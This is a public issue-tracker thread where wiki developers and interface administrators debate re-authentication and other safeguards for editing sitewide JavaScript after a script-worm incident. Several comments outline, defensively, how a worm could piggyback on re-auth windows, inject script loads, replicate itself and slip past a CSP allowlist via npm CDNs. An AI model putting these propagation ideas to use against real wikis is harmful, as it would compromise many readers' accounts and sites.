
Editing sitewide JS/CSS pages should require elevated security
Open, HighPublic

Description

Global JS editing is as dangerous as you can get; it should require reauthentication like password changes and such. (Although possibly with a significantly longer timeout as editing a page might take long.)

The kind of POST stashing done by FormSpecialPage probably would not work so well (as the edit interface might be JS-based); maybe a mechanism similar to session timeouts could be used instead.

Event Timeline


There is zero reason why these 2FA checks can't happen pre-edit.

From what I see, some additional 2FA check has been implemented. Before editing a js gadget on RuWP, I had to confirm it's me. For the next hour or so, however, I had no 2FA checks before any edits.

image.png (492×583 px, 30 KB)

Does anyone know if these re-auths are being applied to API edits? If not, then I am concerned that we are hardening the wrong thing. The March 2026 userscript incident used API editing, I think.

I think this kind of elevated security for browser editing will only protect against some very uncommon cases (little brother sneaking on to your laptop? Trojan horse remote controlling your mouse?)

The attacker's script used CSRF-style onwiki editing to propagate, though, and I think that's what is being stopped here.

Is there any ETA on when the proper implementation will happen? It's becoming increasingly annoying that each action=edit requires full re-authentication.

Note that action=edit doesn't actually change anything. I use it to copy the current code. It's now quicker to use private mode and copy code from there, which is a bit absurd given that the "incident" hasn't really revealed any new security risks (or at least none that I haven't known about for the last 10 years or so)... So yeah, I am annoyed.

I mean bot edits thankfully work e.g. this worked:
https://pl.wikipedia.org/w/index.php?title=MediaWiki:Gadget-refToolbar.js&action=history

Still I had to make a minor change by hand, which took annoyingly long as I was, again, asked twice for the password and token for no apparent reason.
https://pl.wikipedia.org/w/index.php?title=MediaWiki:Gadget-NavFrame.js&diff=prev&oldid=79343077

@Nux for your use case (wanting to copy current code) try ?action=raw

After doing some gadget edits, I can only agree wholeheartedly with the comment above by @Nux. Currently you need to re-login every 15 minutes; you're asked to re-authenticate when renaming something into the MediaWiki namespace, with no actual way to do so; and there is no actual logic behind this decision. Frankly, it is unacceptable that WMF has shown such a glaring lapse of judgment and then forced everyone else to suffer as a consequence.

How there is still no public deadline for developing a less abrasive solution is beyond me. Two weeks was more than enough to build something that only requires the 2FA step, at least. You messed up in a massive way, not us.

Except for certain easy fixes, I currently get stuck due to the 15min timeout. It breaks both "Show changes" (diff) and "Publish changes" (save).

While some easy fixes like typos or copy/paste updates are easy to do within a few seconds or minutes, most gadget maintenance takes longer than this. This time period is essentially the equivalent of a developer doing "git branch" to start work, and then continuing (over writing the patch, iterating on it locally, "git add", "git diff", "git commit", test/review, iterate "git commit --amend", test/review) until the equivalent of "git push" or "scap backport".

When you then press "Show changes" after working 15 min or more, instead of the edit being permitted (based on a valid edit token), or another reauth being offered, it presents this incorrect and internally contradictory error message:

Screenshot 2026-03-27 at 16.25.50.png (652×1 px, 165 KB)

I do not understand how and why a repeated login should be a remedy against automatic malicious operations?

I can listen to the [publish] button when NAMESPACENUMBER is 8 and CONTENTMODEL is css or javascript.

  • If the button is pressed, I set a cookie yippie with current timestamp. Perhaps waiting for some approval etc., or check success of publishing when this page is rebuilt and got a new revision number.
  • On every visited page from now, if yippie is on time I can run a script with everything I want. I am a confirmed account less than a quarter old. I do not leave traces when bounced back, watched by some smart monitoring.
  • I have interface rights, otherwise I would not get a [publish] button in MediaWiki namespace for CSS or JavaScript.

I know only two ways to protect against compromised scripts:

  1. Approve every single edit by an authentication outside the browser (typing a password manually, 2FA, passkey etc.). No bots any more.
  2. Use a second account for interface only. Revoke interface from all regular accounts. Connect interface groups with safemode for this account. No helpful scripts will be executed. Perhaps a gadget, but no user scripts from anywhere. All site gadgets might be disabled in some safesafemode. If not in safemode for this account or at least for this page editing, do not permit interface editing. Do not permit API editing. Be sure that a faked index.php form is not sent to server, by embedding a random hash. Any helpful things might be added by greasemonkey etc., which is hard to attack by compromised user scripts.

The second approach might be extended to all editing of resource pages (at least the javascript content model), in user space or elsewhere, by anybody, and perhaps to similar operations like moving pages or changing the content model to javascript. It would shield against worm proliferation if javascript editing disables all user scripts and the nice site gadgets. It does not help against copying a bulk of random JS into any personal user script, which might be transcluded by other sysops, but such copies could not infect further javascript pages any longer.

It is April 1st now, but this is not a joke.

FYI, a report of another instance of problematic use of common.js, although supposedly not one that requires emergency intervention. I haven't personally looked into this, but it's been brought to the Stewards' Noticeboard: https://meta.wikimedia.org/w/index.php?title=Stewards%27_noticeboard&curid=167407&diff=30384271&oldid=30383621. Based on what I read there, requiring re-authentication seems not to address the problem raised in the noticeboard discussion. The noticeboard discussion may be worth thinking about for possible additional actions.

Given that WMF legal apparently evaluated the script and gave their ok, I don't think there's much to discuss (unless the WMF wants to re-evaluate it).

I constantly have to "re-verify" and really, it's annoying AF. Especially as I have to go retrieve a TOTP code every time.

From my understanding, all this change does is add friction when editing a page, which doesn't add actual security.

On a related note, the 2FA is often failing (I tested it a lot, thanks to the issue at hand...). I've worked around the problem by using the "next code" (which always works) instead of the "current code" (which often fails, even when the code is fresh) from my TOTP generator. I've never encountered such an issue elsewhere.

FYI: This is a typical symptom of your device’s clock not being in sync with global time (if a website is strict about that). You might want to check if you have automatic clock synchronization enabled.

On Fandom wikis, all sitewide CSS/JS requires approval by Fandom staff before it can be put live. We can do the same here.

User makes edit to sitewide CSS/JS -> user clicks "save" -> user prompted to reauth (either with password or with second factor) -> edit is not immediately live for all users until second and third user with (editinterface) permissions on separate IP address approves the edit and auths with their password and second factor.

image.png (560×521 px, 24 KB)

For user scripts it would be: user makes edit to user CSS/JS -> user clicks "save" -> user prompted to reauth (either with password or with second factor) -> user script is live

Of course, a bypass would be possible through the loading of external scripts or sheets from a place like GitHub. But I highly doubt anyone would be able to load external scripts (except for vetted scripts) into site JS or CSS since the edit would almost certainly be rejected by the second interface admin.
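For illustration, the approval flow proposed above could be sketched as a tiny state machine (purely illustrative Python; the class and method names are invented and bear no relation to MediaWiki's actual code):

```python
from dataclasses import dataclass, field

@dataclass
class PendingInterfaceEdit:
    author: str
    author_ip: str
    approvals: dict = field(default_factory=dict)  # approver -> ip
    live: bool = False

    REQUIRED = 2  # the "second and third user" from the proposal above

    def approve(self, approver: str, ip: str, reauthed: bool) -> bool:
        """Count an approval only from a distinct, re-authenticated user
        on an IP address different from the author's."""
        if not reauthed or approver == self.author or ip == self.author_ip:
            return False
        self.approvals[approver] = ip
        if len(self.approvals) >= self.REQUIRED:
            self.live = True  # only now does the change ship to readers
        return True
```

The point of the sketch is simply that the edit stays dark until two independent, re-authenticated interface admins have signed off on it.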

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so? Do we expect communities to have technical people higher up in the hierarchy?

Argh, we are already struggling with so much friction from the current re-authentication timeouts. Adding a multi-person approval layer on top of that would just add more weight to an already difficult workflow.

Most gadget maintenance takes longer than the current window allows; we should be looking for ways to make this process smoother, not introducing bureaucratic hurdles. Even on the largest wikis, there simply isn't a large enough pool of technical admins to sit around and verify every edit, which would effectively paralyze work.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so? Do we expect communities to have technical people higher up in the hierarchy?

Yep.

  • The person (human being) itself is trusted.
  • However, some JS might be running in the background while editing JS/CSS other than in own userspace.

The challenge is to make sure that no malicious JS is running anywhere, at least not read from any wiki space.

  • Some safemode would be helpful as soon as JS/CSS is edited out of own user space. Or even for every JS/CSS edit.
  • JS from MediaWiki but no wiki page might be trusted.
  • Site JS might be corrupted already, both Gadgets and site resources.
  • Personal user JS is most unsafe.
  • In safemode no helpers nor personal configuration are available. However, via Greasemonkey or browser JS something might be used for equipping the page edit, which could not be attacked by a worm inside wiki pages.
This comment was removed by Ladsgroup.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so? Do we expect communities to have technical people higher up in the hierarchy?

Other interface administrators or WMF staff with the technical expertise to understand which changes potentially introduce security problems.

Adding a multi-person approval layer on top of that would just add more weight to an already difficult workflow.

Being slow should be a feature, not a bug. Especially when one rogue interface admin account can paralyze one of the top 10 most visited websites. There are definitely ways to make the experience a bit more seamless, such as allowing Windows Hello/Face ID/Touch ID/Android Screen Lock/Mobile phone passkeys/YubiKeys/other FIDO2 compliant technologies as a second factor. And ideally, it should be just as easy to "unapprove" an edit to a script as it is to "approve" it.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so? Do we expect communities to have technical people higher up in the hierarchy?

Adding a multi-person approval layer on top of that would just add more weight to an already difficult workflow.

See also: T71445: Implement a proper code-review process for MediaWiki JS/CSS pages on Wikimedia sites

Status quo ante should just be restored, given that this 'incident' is frankly the stupidest example of shooting yourself in the foot and then calling the cops on a random passerby. The fact that a month later @sbassett hasn't at least personally improved the stop-gap solution, never mind personally apologised for forcing everyone to jump through hoops to edit sitewide JS, is a sign that there is something fundamentally rotten in how the entire security team handled this 'incident' of their own making. And clearly no one on the team cares about the impact of their decisions.

The details may not have escaped outside of WMF, but I know that @sbassett has been appropriately contrite. Please focus on the problem rather than the person who has accidentally reminded us how easily the problem can happen.

I do not understand how and why a repeated login should be a remedy against automatic malicious operations? (…)

The repeated login indeed doesn't protect you against yourself (or your own malicious user scripts, browser extensions, Greasemonkey scripts, etc.), for the reasons you explain, but it prevents other interface editors visiting the compromised site from unwittingly contributing to the attack. The reauthentication wouldn't have prevented the initial compromise, but it would have greatly reduced the mess. If we had this requirement in place at the time of the incident, then the first person who noticed the problem could have reverted the malicious site JS edit and ended it. Instead, accounts of other visitors were used to restore the compromised JS, and the site had to be put in read-only mode.

That said, I am also hoping that we implement a less disruptive version of it soon. It looks like we've recently made the code of the current mitigation public (T419621), so I think work is ongoing.

On a related note, the 2FA is often failing (I tested it a lot, thanks to the issue at hand...). I've worked around the problem by using the "next code" (which always works) instead of the "current code" (which often fails, even when the code is fresh) from my TOTP generator. I've never encountered such an issue elsewhere.

FYI: This is a typical symptom of your device’s clock not being in sync with global time (if a website is strict about that). You might want to check if you have automatic clock synchronization enabled.

We have a tolerance of 4 30-second windows before and after the correct time window (https://codesearch.wmcloud.org/deployed/?q=OATHAuthWindowRadius), which (based on 5 minutes of research) is rather permissive.

The least-worst solution I see is to disable execution of JS from wiki pages when editing certain pages within the MediaWiki: namespace, as mentioned in PerfektesChaos's messages above:

when NAMESPACENUMBER is 8 and CONTENTMODEL is css or javascript

  • Some safemode would be helpful as soon as JS/CSS is edited out of own user space. Or even for every JS/CSS edit.
  • JS from MediaWiki but no wiki page might be trusted.

After all, we already do this on Special:Preferences without much complaint; at most, it causes a small surprise. There isn't really any JS so crucial to the editing process.

A related issue I’d like to mention is that when editing one’s own personal JS subpages, the code is executed during the preview! This is very surprising, an open invitation to shoot oneself in the foot, and potentially even a security hole. I cannot recall a single instance where this "feature" was actually useful to me.

The details may not have escaped outside of WMF, but I know that @sbassett has been appropriately contrite. Please focus on the problem rather than the person who has accidentally reminded us how easily the problem can happen.

The details are pretty much public. There is no way any competent interface admin on any wiki would load thousands of scripts from random users, especially users with no edits, to check if they're working after the changes they've made. The fact that after this wild malpractice interface admins are suffering from unnecessary and ill-written restrictions (that are not in any way related to someone running thousands of scripts from their privileged account) is an insult. And the elephant in the room in this whole situation. The security team didn't expose anything that wasn't known by them for years, they just exposed themselves to the silliest exploit.

(This is not the opposition to restrictions overall but rather the haste and the way the current implementation works, as well as clear ignoring of the voices of the competent people affected by this and not at all working in consultation with us.)

Status quo ante should just be restored, given that this 'incident' is frankly the stupidest example of shooting yourself in the foot and then calling the cops on a random passerby. The fact that a month later @sbassett hasn't at least personally improved the stop-gap solution, never mind personally apologised for forcing everyone to jump through hoops to edit sitewide JS, is a sign that there is something fundamentally rotten in how the entire security team handled this 'incident' of their own making. And clearly no one on the team cares about the impact of their decisions.

@stjn, If your current goal is only to call out a single individual and/or grandstand on a specific WMF team, can I suggest you take it somewhere else?

I can understand that you are upset, but forcibly subscribing specific individuals to tasks just to call them and their actions out feels like it oversteps the bounds of civility.

My current goal is to say that the half-baked solution that isn't relevant to the incident but did significantly increase the friction of doing good-faith edits should be removed and the actual solution should be done with care and consideration to the editors and without that friction. If the point was to make people stop doing the edits as much as possible, then I guess it's not a problem.

@stjn: Please read and follow https://www.mediawiki.org/wiki/Bug_management/Phabricator_etiquette if you'd like to remain active in Wikimedia Phabricator. Thanks for your understanding.

The least-worst solution I see is to disable execution of JS from wiki pages when editing certain pages within the MediaWiki: namespace, as mentioned in PerfektesChaos's messages above:

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour; you check that cookie upon editing of MediaWiki:*.js, redirect if it is missing, and done. Probably one day of work, a bit more for translations.

Status quo ante should just be restored, given that this 'incident' is frankly the stupidest example of shooting yourself in the foot and then calling the cops on a random passerby. The fact that a month later @sbassett hasn't at least personally improved the stop-gap solution, never mind personally apologised for forcing everyone to jump through hoops to edit sitewide JS, is a sign that there is something fundamentally rotten in how the entire security team handled this 'incident' of their own making. And clearly no one on the team cares about the impact of their decisions.

https://en.wikipedia.org/wiki/Security_theater

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

  • Ask for re-auth only when publishing, not when opening the edit page.
  • Since the painful re-auth remains (and happens at a time when failure is more detrimental), we could reduce the cognitive disruption by "announcing" it: style the "Publish changes" button differently (e.g., adding a padlock icon before the button text) and extend the tooltip: « Publish your changes. You may be asked to authenticate again. [alt-s] »
  • An important point: if publishing fails because the user cannot re-auth for any reason (e.g., no immediate access to credentials or a TOTP generator), they should be able to reliably recover their pending content (rather than hitting the browser's "Back" button and crossing their fingers).
  • An ideal workflow would be a modal pop-up for the re-auth so the edit page isn't left at all during the process. However, I’m not sure if the development effort and increased codebase complexity would be worth it for this single use case.

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour; you check that cookie upon editing of MediaWiki:*.js, redirect if it is missing, and done. Probably one day of work, a bit more for translations.

That approach does not work.

  • I have described in detail that I will wait until there is an interactive person who is able to do vulnerable editing. Now I can set my own cookie. If that edit has been saved, I can exploit my own cookie for the next 14 or 59 minutes and run my worm proliferation every time any further page is viewed, since I know that the security cookie is alive.

Pandora's box has been opened: through the several-hour edit shutdown, the entire world learnt how to build a worm that infects more and more JS pages at many wikis, starting the nuke attack some days later.

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

There are two ways of attacking:

  • In interactive context, running the worm proliferation if a JS page is edited, or simulation of interactive editing by sending the interactive form fields.
  • In API mode, based upon permission of the requesting account.

Both need to be blocked.

The one and only way to ensure that you really want to edit this, and that no automatic process is involved, is to authorize this edit by something outside the browser page. All cookies are within the page.

  • Furthermore you should be sure that no malicious JS is running which injects some mw.loader.load(URL); with my worm implementation.

Indeed, there are the edits using the JS API, and most of what is discussed here doesn't guard against them, although it's the most straightforward way of worm propagation. Adding safeguard steps to web edits (i.e., the regular form) adds little to no security if we don't guard against the primary attack vector.

I thought of implementing a secret token, dedicated to editing critical pages using the API, which could be found or regenerated in Special:Preferences. As the token would not be publicly exposed, user scripts would no longer be able to edit these pages (unless they implement a prompt for the token). This would still add some inconvenience, but from a security standpoint, it would be very strong.

People running bot apps would just have to add the token to their private codebase (ideally as an "env" item); it's one-time work and after this they're all set. Note that bot accounts usually don't have the right to edit these pages, so it's limited to the specific case of "interface editor rights + automated edit".
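On the bot side, the "env item" suggestion could look something like the following sketch (the `INTERFACE_EDIT_TOKEN` variable and the `interfacetoken` API parameter are hypothetical; no such parameter exists in the MediaWiki API today):

```python
import os

def build_edit_request(title: str, text: str) -> dict:
    """Assemble an action=edit POST body, attaching the hypothetical
    interface-edit token from the environment when touching site JS/CSS."""
    params = {"action": "edit", "title": title, "text": text, "format": "json"}
    if title.startswith("MediaWiki:") and title.endswith((".js", ".css")):
        token = os.environ.get("INTERFACE_EDIT_TOKEN")
        if not token:
            raise RuntimeError("editing interface pages requires INTERFACE_EDIT_TOKEN")
        params["interfacetoken"] = token
    return params
```

Since the token lives in the bot's environment rather than in anything a wiki page can read, an on-wiki script cannot attach it to its own API calls.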

The details are pretty much public. There is no way any competent interface admin on any wiki would load thousands of scripts from random users, especially users with no edits, to check if they're working after the changes they've made.

For something like this to go very wrong would require much more than incompetence on one individual. A couple of years ago LinusTechTips was session-hijacked after an unwitting employee thought he was opening a PDF but was instead opening a token sniffer. People make mistakes, so the system must be forgiving to accommodate those mistakes.

There is an old saying, "trust but verify", which definitely applies to software security as well. If a user is performing a sensitive action, always assume that they are unauthorized until they can prove they are authorized. For someone with a privileged right to be able to make an edit to site JS/CSS without any form of secondary approval is akin to having everyone commit their changes straight to prod rather than to their own branch in Git.

Indeed, there are the edits using the JS API, and most of what is discussed here doesn't guard against them, although it's the most straightforward way of worm propagation. Adding safeguard steps to web edits (i.e., the regular form) adds little to no security if we don't guard against the primary attack vector.

I think part of the problem is that once your threat model includes code execution in the browser environment, you have effectively "lost the fight" against the API.

People running bot apps would just have to add the token to their private codebase (ideally as an "env" item); it's a one-time work and after this they're all set. Note that bot accounts usually don't have the right to edit these pages, so it's limited to the specific case of "interface editor rights + automated edit".

Not a bad idea; maybe restrict it behind an OAuth grant of some kind?

My current goal is to say that the half-baked solution that isn't relevant to the incident but did significantly increase the friction of doing good-faith edits should be removed and the actual solution should be done with care and consideration to the editors and without that friction. If the point was to make people stop doing the edits as much as possible, then I guess it's not a problem.

The current solution is staying, but replacing it with something with more care and consideration is a top priority of the PSI team right now.

We published this page last month that describes our priorities over the next few months: https://www.mediawiki.org/wiki/Product_Safety_and_Integrity/Account_Security/Securing_User-Managed_Code

The "roadmap" section there just generally describes April to June, but we will not wait until the end of that period to replace the current reauthentication approach for sitewide JS editing. We haven't landed on an exact date, but it is likely to be in May (though you will see coding work on it happening in April). We'll have a more precise date as we get further ahead on the work.

The discussion on the best way to achieve it here is quite welcome - now is the time to influence our thinking on it. Our goal is to implement a streamlined UX (especially for users with passkeys) that is specific to the permissions being requested and not modifiable by user scripts, and that is dynamic enough about when it triggers that it doesn't get in the way of users who are exercising their permissions repeatedly over a sustained period of time.

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

  • Ask for re-auth only when publishing, not when opening the edit page.

This is a good idea, and probably the best solution to T423193. This would be a bit complicated because we have to preserve/stash the submitted edit while going through the reauth process, but we will have to do that regardless (to handle the case where your reauth times out after you click edit but before you click submit), and we're already planning to do it soon. I think we should be able to do this in the next month or two.

  • Since the painful re-auth remains (and happens at a time when failure is more detrimental), we could reduce the cognitive disruption by "announcing" it: style the "Publish changes" button differently (e.g., adding a padlock icon before the button text) and extend the tooltip: « Publish your changes. You may be asked to authenticate again. [alt-s] »

This is a great suggestion too, we will aim to do this as part of T197136.

  • An important point: if publishing fails because the user cannot re-auth for any reason (e.g., no immediate access to credentials or a TOTP generator), they should be able to reliably recover their pending content (rather than hitting the browser's "Back" button and crossing their fingers).

Yes, this is really important. We have to preserve the pending content regardless (because it has to persist through the reauth steps before it gets submitted), but if the reauth fails / is aborted, we should send the user back to the edit form with their pending content still in it.

What would be even better is if we could have the reauth happen in a popup. There is code to enable (re-)logins in a popup that was written a few years ago but never used for anything, this would be a great use case for that.

  • An ideal workflow would be a modal pop-up for the re-auth so the edit page isn't left at all during the process. However, I’m not sure if the development effort and increased codebase complexity would be worth it for this single use case.

... I swear I didn't read this before I wrote my comment above, it was hidden and I just scrolled down to reveal it. Yes, exactly this, and thankfully the development effort already happened a few years ago, so we should be able to just grab the login popup system off the shelf and use it.

Also, if the intent is to safeguard users from malicious JS execution, then it should be possible to enable safe mode for yourself and then not have to deal with the annoying and ill-written restrictions that exist right now. I would much rather toggle that setting and do my edits in peace than have to re-login every 15 minutes for no reason (I don’t think any website is as draconian in their restrictions of this kind; even GitHub's sudo mode for changing restricted settings is much more permissive).

How about only asking for the password? That should be sufficient, right? Not even filling in the username and password — no, just the password.
In other words, switching from “re‑authenticate to confirm” to “type your password to confirm” (compatible with browser autofill, of course).

Password entry is very convenient thanks to the browser remembering it, whereas 2FA is annoying AF, even with a local TOTP generator right in the next browser tab — which is probably one of the most convenient setups possible.

I can tolerate 2FA, but only barely… mainly because the TOTP code is only required at login. But every 15 minutes, especially when one is in the flow of editing files? Hell no.

Indeed, there are also edits made via the JS API, and most of what is discussed here doesn't guard against them.

For what it's worth, the current temporary solution applies to API edits in the browser too (see T419621#11827741), and presumably the new one will as well.

I thought of implementing a secret token, dedicated to editing critical pages using the API, which could be found or regenerated in Special:Preferences. As the token would not be publicly exposed, user scripts would no longer be able to edit these pages (unless they implemented a prompt for the token). This would still add some inconvenience, but from a security standpoint it would be very strong.

People running bot apps would just have to add the token to their private codebase (ideally as an "env" item); it's one-time work, and after that they're all set. Note that bot accounts usually don't have the right to edit these pages, so this is limited to the specific case of "interface editor rights + automated edits".

You're basically describing an OAuth consumer or a bot password, which you can use today :) (and which allow edits to site JS, if you grant the necessary rights while creating them).

Why is this even necessary?

See my reply to @PerfektesChaos in comment T197137#11821539.

Also, if the intent is to safeguard users from malicious JS execution, then it should be possible to enable safe mode for yourself and then not have to deal with the annoying and ill-written restrictions that exist right now. I would much rather toggle that setting and do my edits in peace than have to re-login every 15 minutes for no reason (I don't think any website is as draconian in restrictions of this kind; even GitHub's sudo mode for changing restricted settings is much more permissive).

On the one hand, I like this suggestion, and I'm a fan of enabling safe mode for yourself in preferences if you have too many scary rights (you can do this today, and in global preferences too; I use it myself).

On the other hand, you can't test the site JS changes you're making while in safe mode, so this seems a bit impractical. I think it'd be reasonable to do this, but a well-implemented reauth requirement (less annoying than what we have now) would probably be better.

How about only asking for the password? That should be sufficient, right? Not even filling in the username and password — no, just the password.
In other words, switching from “re‑authenticate to confirm” to “type your password to confirm” (compatible with browser autofill, of course).

Password entry is very convenient thanks to the browser remembering it, whereas 2FA is annoying AF, even with a local TOTP generator right in the next browser tab — which is probably one of the most convenient setups possible.

I can tolerate 2FA, but only barely… mainly because the TOTP code is only required at login. But every 15 minutes, especially when one is in the flow of editing files? Hell no.

TOTP is by far the least convenient 2FA setup we support :) The only good thing about it is that it's low-tech, since you can generate TOTP codes on any device you already have.

For convenience, a security key like Yubikey is much nicer (you only need to touch the dongle plugged into your computer), or a passkey, which can also be remembered by the browser.

It would also be much easier, and marginally more secure, if instead of MediaWiki simply executing common.js/[skin].js, user scripts were loaded via an ImportJS text file or something similar. Fandom has this as an option for its sites.

The benefits: we can disable external loading of off-site scripts in the common.js file; we can disallow loading of scripts from any namespace other than MediaWiki:; we can more rigorously enforce code review for any site-wide script before ImportJS will load it (ImportJS would still require interface admin rights); and we can record a script's usage if users had to use ImportJS instead of common.js files. No one could then compromise an entire wiki by pasting a malicious script onto common.js.

The downside is that it would require a ton more JS pages to be created in the MediaWiki namespace.

Perhaps it's worth a ponder for gadgets.

disable external loading of off-site scripts in the common.js file

Small note: since the incident we've turned on CSP, so all external scripts not on an allowlist are now blocked.
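For readers unfamiliar with the mechanism: a CSP of roughly the following shape is what makes the browser refuse any script loaded from outside the allowlist. The exact directive below is a simplified illustration, not the actual deployed policy; the two CDN domains are the ones mentioned elsewhere in this thread.

```text
Content-Security-Policy:
    script-src 'self'
        https://cdn.jsdelivr.net
        https://raw.githubusercontent.com
```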

Can you link to an example ImportJS text file, and maybe include a code snippet of loading the file, so I can visualize how this works?

How about only asking for the password? That should be sufficient, right? Not even filling in the username and password — no, just the password.

That's exactly T197153.

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

  • Ask for re-auth only when publishing, not when opening the edit page.

This is a good idea, and probably the best solution to T423193. This would be a bit complicated because we have to preserve/stash the submitted edit while going through the reauth process, but we will have to do that regardless (to handle the case where your reauth times out after you click edit but before you click submit), and we're already planning to do it soon. I think we should be able to do this in the next month or two.

Yeah. The current approach is not working at all.

  1. I get asked for auth when fetching the code.
  2. I work on fixing the code.
  3. I have no option to freaking re-auth and save the page...

And yes, the message is just wrong.

obraz.png (997×1 px, 147 KB)

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour; you check that cookie upon edits of MediaWiki:*.js pages, redirect if it's missing, and done. Probably one day of work, a bit more for translations.

That approach does not work.

  • I have described in detail that I will wait until there is an interactive person who is able to do vulnerable editing. Now I can set my own cookie. If that edit has been saved, I can exploit my own cookie for the next 14 or 59 minutes and run my worm proliferation every time any further page is viewed, since I know that the security cookie is alive.

Pandora's box has been opened: through the several-hour edit shutdown, the entire world learnt how to build a worm infecting more and more JS pages at many wikis, starting the nuke attack some days later.

All auth is just cookies and session. All that is needed is to establish that the session is in some "can-edit-important-stuff" mode. For that you only need:

  1. A place where user scripts are not running. E.g. a special page (like prefs).
  2. Human interaction.
  3. Adding a cookie that cannot be altered by JS (and/or some session param). https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Cookies#block_access_to_your_cookies
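Point 3 can be sketched as follows. This is a hypothetical header-building helper, not MediaWiki's actual code, and the cookie name is made up:

```javascript
// Issue the "can-edit-important-stuff" marker as a cookie that page JS can
// neither read nor forge, thanks to the HttpOnly attribute.
function buildSecureEditCookie(token, maxAgeSeconds) {
  return [
    `secureEditToken=${token}`,
    `Max-Age=${maxAgeSeconds}`,
    'Path=/',
    'Secure',          // only ever sent over HTTPS
    'HttpOnly',        // invisible to document.cookie, so site JS cannot steal it
    'SameSite=Strict', // never attached to cross-site requests
  ].join('; ');
}

console.log(buildSecureEditCookie('abc123', 3600));
```

The server would emit this string as a `Set-Cookie` header; because of `HttpOnly`, even a compromised gadget running on the page cannot read or replay the token via `document.cookie`.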

disable external loading of off-site scripts in the common.js file

Small note: since the incident we've turned on CSP, so all external scripts not on an allowlist are now blocked.

Can you link to an example ImportJS text file, and maybe include a code snippet of loading the file, so I can visualize how this works?

Which still allows anyone to push any code to npm and use an npm CDN that is allowed in the CSP. So the CSP is mostly useless: it blocks legitimate requests and breaks tools, yet doesn't block the real attacks that can still happen.

TOTP is by far the least convenient 2FA setup we support :) The only good thing about it is that it's low-tech, since you can generate TOTP codes on any device you already have.

For convenience, a security key like Yubikey is much nicer (you only need to touch the dongle plugged into your computer), or a passkey, which can also be remembered by the browser.

Aside — I personally disagree with this:

  • I strongly dislike using smartphones, and getting my fat a** out of the chair to go get the phone and unlock it is annoying AF to me.
  • My computer is about two meters away; again, getting up to touch a YubiKey would be very annoying, and using a USB extension cable would add ridiculous clutter.
  • I dislike fingerprint sensors, which often fail to work. Same with face detection, etc. I prefer clear, reliable actions like pressing physical keys — not swiping, touching, or hoping a sensor recognizes me.
  • Typing a PIN would be about as tedious as copy‑pasting a TOTP code.

Manual TOTP copy‑paste is genuinely the best workflow for me. I do it very fast, and it adds the least amount of friction I can achieve.

But even the least amount of friction can sometimes be too much… like having to do it every 15 minutes (the repetition gets tiresome), or when you’re in deep work and an interruption breaks your focus.

(And despite how this sounds, don’t worry — I do get my exercise, but at different times.)

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour; you check that cookie upon edits of MediaWiki:*.js pages, redirect if it's missing, and done. Probably one day of work, a bit more for translations.

That approach does not work.

  • I have described in detail that I will wait until there is an interactive person who is able to do vulnerable editing. Now I can set my own cookie. If that edit has been saved, I can exploit my own cookie for the next 14 or 59 minutes and run my worm proliferation every time any further page is viewed, since I know that the security cookie is alive.

Pandora's box has been opened: through the several-hour edit shutdown, the entire world learnt how to build a worm infecting more and more JS pages at many wikis, starting the nuke attack some days later.

All auth is just cookies and session. All that is needed is to establish that the session is in some "can-edit-important-stuff" mode. For that you only need:

  1. A place where user scripts are not running. E.g. a special page (like prefs).
  2. Human interaction.
  3. Adding a cookie that cannot be altered by JS (and/or some session param). https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Cookies#block_access_to_your_cookies

Having thought about this more, I agree that the current solution adds more friction (as most people here are saying) while at the same time NOT adding much security.

I mean, you can make a popup like T423193 suggests. But in a popup you still say "unlock API for a while". So you unlock the API and then a dormant worm might attack (as @PerfektesChaos suggested). The window is smaller, but it's still there. You could go further and have the popup say "unlock editing for MediaWiki:Gadget-something.js for the next 5 minutes". That still doesn't say which content is added; a worm could hijack the submit and replace the JS script contents. The risks are smaller, but they are still there. And the popup would have to be in a sandbox, which complicates it (you would have to use window.parent.postMessage to communicate the action from the iframe to the parent).

So... I now agree with @Od1n that a better approach would be to edit pages without user JS. This can be done as follows:

  1. Create something like /wiki/Special:SecureEdit?title=Mediawiki:Gadget-something.js for editing fragile pages. The page is just like a normal edit page but does not load most scripts.
  2. Redirect all edits of fragile pages to Special:SecureEdit.
  3. Forbid the submit action on the fragile pages.
  4. Forbid API actions on the fragile pages (still allow for botpassword session).

This works well because:

  1. You cannot inject anything into that special page as long as you cannot create service workers on the main path (and currently you cannot do that).
  2. The special page doesn't load web-editable scripts.
  3. The special session will not end (and so T423193 becomes irrelevant).
  4. You can define what counts as a "fragile page" in a separate place, which makes things easy to configure and change in the future.

No one can then compromise an entire wiki by pasting their malicious script onto common.js.

No: a malicious script can be self-contained (e.g. in JS, converting a function to a string yields its source code). Also, even if we disable loading of external scripts, a malicious script can simply fetch an external (or even Wikimedia-hosted) webpage and eval it.
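The self-containment trick mentioned above is a one-liner in plain JS:

```javascript
// A payload can carry its own source: Function.prototype.toString() returns
// the code, and an eval-like primitive re-creates the function from it.
function payload() {
  return 'arbitrary behaviour';
}

const source = payload.toString();                    // the full source text
const clone = new Function(`return (${source});`)();  // rebuilt from the string

console.log(clone()); // identical behaviour to the original
```

This is why blocking external script loading alone cannot stop a worm: the whole worm can travel inside the page text it infects.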

Which still allows anyone to push any code to npm and use an npm CDN that is allowed in the CSP. So the CSP is mostly useless: it blocks legitimate requests and breaks tools, yet doesn't block the real attacks that can still happen.

